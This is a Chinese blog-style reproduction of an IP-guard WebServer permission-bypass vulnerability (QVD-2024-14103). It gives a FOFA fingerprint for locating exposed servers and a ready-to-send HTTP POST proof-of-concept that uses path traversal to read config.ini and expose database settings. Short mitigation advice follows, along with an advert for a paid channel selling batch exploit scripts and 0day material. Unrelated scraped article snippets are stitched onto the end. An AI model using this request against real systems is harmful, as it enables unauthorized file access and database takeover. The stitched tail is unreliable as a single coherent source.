IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

0x03 漏洞威胁

2024年4月,互联网上披露IP-guard WebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞。

漏洞成因

由于权限验证机制中存在设计缺陷,攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

漏洞影响

该漏洞的成功利用允许攻击者规避安全验证,通过后端接口执行文件的任意读取和删除操作。利用这一漏洞,攻击者有可能获取数据库的配置详情,并控制整个数据库系统。

影响范围

IP-guard < 4.82.0609.0

0x04 漏洞环境

FOFA:

icon_hash="2030860561"

0x05 漏洞复现

POC

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencodedpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

读取config.ini

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

临时缓解方案

配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止包含这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。

如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复方案

官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.82.0609.0版本及以上。

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25

星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/318.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Mac下brew安装php7.4

这里作者挂了梯子&#xff0c;所以很流畅&#xff01; brew的下载&#xff0c;可参考另外一篇博文&#xff5e;Homebrew 安装与卸载 1、将第三方仓库加入brew brew tap shivammathur/php2、安装指定版本的PHP brew install php7.43、替换Mac自带PHP环境并刷新环境变量 -> …

【ACM列表推荐会议 | EI稳定检索】2024年第四届人工智能、自动化与高性能计算国际会议(AIAHPC 2024)

2024年第四届人工智能、自动化与高性能计算国际会议&#xff08;AIAHPC 2024&#xff09; 2024 4th International Conference on Artificial Intelligence, Automation and High Performance Computing 2024第四届人工智能、自动化与高性能计算国际会议(AIAHPC 2024)将于20…

在mac上安装好python开发环境(pyenv、pyenv-virtualenv、docker-desktop、mysql5.7),一文解决环境问题

前言 python各种版本管理器、包管理器实在是太多了&#xff0c;感兴趣的可以看我的另一篇博客&#xff1a;http://t.csdnimg.cn/SRRyC 但是说实话&#xff0c;建议不要看&#xff0c;直接入手本文如下的环境配置就好了。 保证都是比较前沿&#xff0c;运用范围都比较广的&#…

clickhouse ttl不生效

现象&#xff1a; 日志保留31天&#xff0c; 但是发现1年前的数据还有。 表结构&#xff1a; CREATE TABLEads_xxxx_metrics_1m_local (static_time String COMMENT 统计时间,......) ENGINE ReplacingMergeTree (process_time) PARTITION BYtoYYYYMMDD (toDate (static_tim…

【网站项目】新生报到系统小程序

&#x1f64a;作者简介&#xff1a;拥有多年开发工作经验&#xff0c;分享技术代码帮助学生学习&#xff0c;独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。&#x1f339;赠送计算机毕业设计600个选题excel文件&#xff0c;帮助大学选题。赠送开题报告模板&#xff…

局域网MongoDB的数据库访问不了

局域网MongoDB的数据库访问不了 确认bindIp: 0.0.0.0后&#xff0c;仍然是访问不了&#xff0c;查询资料发现是windows自带防火墙的问题 进入到 允许其他应用&#xff0c;选择mongod.exe的位置 这样就好了。

【电路笔记】-数字逻辑门总结

数字逻辑门总结 文章目录 数字逻辑门总结1、概述2、逻辑门真值表3、总结 数字逻辑门有三种基本类型&#xff1a;与门、或门和非门。 1、概述 我们还看到&#xff0c;数字逻辑门具有与其相反或互补的形式&#xff0c;分别为“与非门”、“或非门”和“缓冲器”&#xff0c;并且…

使用idea如何打开python项目

1.查看python路径&#xff0c;winR>cmd>where python,可以找到python.exe文件 2.解决方案&#xff1a; 1.首先找到python安装位置。 &#xff08;如&#xff1a; D:\VS2019\共享组件、工具和SDK\Python37_64 &#xff09; 2.查找pip工具路径。 &#xff08;Python37…

PostCSS概述以及详细使用代码案例

简介&#xff1a; PostCSS是一个使用JavaScript插件来转换样式的工具。它的目标是探索CSS工具的新可能性&#xff0c;特别是在自动化和优化方面。它允许你使用未来的CSS特性&#xff0c;同时优化现有的CSS代码&#xff0c;使其更加高效和兼容。PostCSS本身并不直接对CSS进行操…

ansible进阶-剧本调试方法

目录 1、调试方法 2、实例 2.1 Debug模块 2.2 tags标签 2.3 忽略错误 1、调试方法 具体方法应用场景debug标签执⾏剧本的时候输出剧本的执⾏流程,⼀般配合register⼀起使⽤. 输出facts变量自定义变量tags标签给⼀些模块加上标签,运⾏剧本的时候可以运⾏指定标签的…

OpenHarmony UI动画-rebound

简介 rebound是一个模拟弹簧动力学&#xff0c;用于驱动物理动画的库。 下载安装 ohpm install ohos/reboundOpenHarmony ohpm环境配置等更多内容&#xff0c;请参考如何安装OpenHarmony ohpm 使用说明 import rebound from ohos/rebound;功能一&#xff1a;创建维护弹簧对…

MySQL 锁机制全面解析

目录 1. MySQL的锁类型1.1 全局锁1.2 表锁1.3 行锁1.4 共享锁&#xff08;读锁&#xff09;1.5 排它锁&#xff08;写锁&#xff09;1.6 死锁 2 乐观锁和悲观锁2.1 乐观锁2.2 悲观锁 3 意向锁4 间隙锁5 临键锁6. 事务隔离级别对锁的影响6.1 读未提交&#xff08;Read Uncommitt…

3ds Max2024安装包(亲测可用)

目录 一、软件简介 二、软件下载 一、软件简介 3ds Max是一款基于PC系统的强大3D建模、渲染和制作软件&#xff0c;广泛应用于游戏开发、影视后期制作、建筑设计、工业设计等多个领域。其拥有丰富的建模工具&#xff0c;可轻松创建逼真的三维场景和模型&#xff1b;同时&#…

决策树(分类决策树)

分类决策树是一种基于树状结构的监督学习模型&#xff0c;主要用于对数据进行分类任务。它通过一系列规则&#xff08;即树的分支&#xff09;对输入数据进行递归划分&#xff0c;最终达到预测输出类别&#xff08;即树的叶节点&#xff09;的目的。分类决策树以其直观易懂、解…

OpenMesh 极小曲面(局部迭代法)

文章目录 一、简介二、实现代码三、实现效果参考资料一、简介 我们的目标是想得到一个曲率处处为0的曲面,具体操作如下所述: 二、实现代码 #define _USE_MATH_DEFINES #include

前端实现Excel文件导出功能的完整指南(vue实现excel文件导出功能)

简介&#xff1a;在许多Web应用程序中&#xff0c;导出数据到Excel文件是一项常见的需求。本文将介绍如何通过前端代码实现Excel文件的导出功能&#xff0c;以及如何优化和扩展这一功能&#xff0c;以满足不同场景下的需求。这里来记录一下 一. 技术背景 在许多业务场景中&…

springboot日志使用 SLF4J+Logback 实现(springboot默认的日志实现),日志打印到控制台及日志输出到指定文件

还是直接上代码 Slf4j 这玩意 默认支持 不用引入 yml 配置文件 # 日志配置 如果配置了xml 这个就不生效了 xml优先级最高 #logging: # file: # path: /home/logs # 日志目录地址 # name: /home/logs/skeleton.log # max-size: 1KB # 设置日志大小的最大大小 1…

DevOps转型的意义:加速创新、提高效率

DevOps作为一种文化和方法论&#xff0c;正在成为现代软件开发和运维的核心。本文将探讨DevOps转型的意义&#xff0c;以及它对组织的影响&#xff0c;如何加速创新、提高效率&#xff0c;并为企业赋予竞争优势。 --- 在当今数字化时代&#xff0c;软件开发和运维已经成为企业竞…

ELB 后端主机异常

场景&#xff1a;运维同事发现某个业务访问不正常&#xff0c;用户访问页面得不到响应。查看elb(共享ELB)后端主机组发现&#xff0c;后端主机组显示异常。开始以为是共享负载均衡的问题&#xff0c;修改监控检查协议为tcp,之前是http协议。发现后端主机组显示正常。但是业务不…

Ubuntu22.04.4 - SSH - 笔记

SSH在Ubuntu22.04.4环境下的笔记 在服务器安装的时候勾选了ssh选项&#xff0c;后面都是默认配置信息 一、允许 root ssh 登录 这里遇到了 使用xshell 连接虚拟机&#xff0c;出现拒绝密码的提示 cp /etc/ssh/sshd_config /etc/ssh/sshd_config.ori 备份 vi /etc/ssh/sshd_con…